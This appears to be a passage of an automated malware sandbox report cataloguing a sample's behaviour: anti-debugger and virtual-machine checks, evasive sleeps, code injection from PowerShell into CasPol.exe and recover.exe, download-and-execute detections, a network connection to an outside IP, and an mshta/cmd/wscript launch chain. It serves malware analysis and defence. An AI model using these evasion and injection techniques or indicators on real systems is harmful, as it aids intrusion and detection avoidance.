Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

9_2_0040BAE3

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

8_2_0041A941

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3002	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6447	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 1830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 7565	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: foregroundWindowGot 1769	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1972	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1972	Thread sleep time: -132000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep count: 1830 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep time: -5490000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep count: 7565 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5620	Thread sleep time: -22695000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4440	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4560	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	8_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	8_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044E989 FindFirstFileExA,	8_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	8_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	8_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00406F13 FindFirstFileW,FindNextFileW,	8_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10006580 FindFirstFileExA,	8_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_00407357

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A8D8 memset,GetSystemInfo,

9_2_0041A8D8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware svga
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: name!vmware virtual s scsi disk device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware pointing device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware sata
Source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachineDetector
Source: wscript.exe, 00000003.00000002.1044412866.0000000002ABA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041232593.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041666626.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041729244.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041599868.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1044588740.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.000000000125E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2812724902.0000021A9505B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2812106156.0000021A8F82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: powershell.exe, 00000005.00000002.1078641425.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware vmci bus device
Source: powershell.exe, 00000005.00000002.1092014147.0000000007744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware sata{0} ({1})
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareU{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }}
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware @\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware@\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware usb pointing device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware s
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Dr!vmware virtual s scsi disk device
Source: powershell.exe, 00000005.00000002.1078641425.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware s@\Dr
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: powershell.exe, 00000005.00000002.1078641425.00000000052DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype(
Source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: virtualmachinedetector

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\recover.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_0043B88D

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

9_2_0040BAE3

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_0041D0CF

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004438F4 mov eax, dword ptr fs:[00000030h]		8_2_004438F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]		8_2_10004AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

8_2_00411999

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00435398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0043B88D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00434D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00434F01 SetUnhandledExceptionFilter,	8_2_00434F01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 23.186.113.60 443

Jump to behavior

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_6296.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6296.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_00418267

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 472000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47D000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EB8008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2FFC008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 61C008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 315F008	Jump to behavior

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004197D9 mouse_event,

8_2_004197D9

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak	Jump to behavior
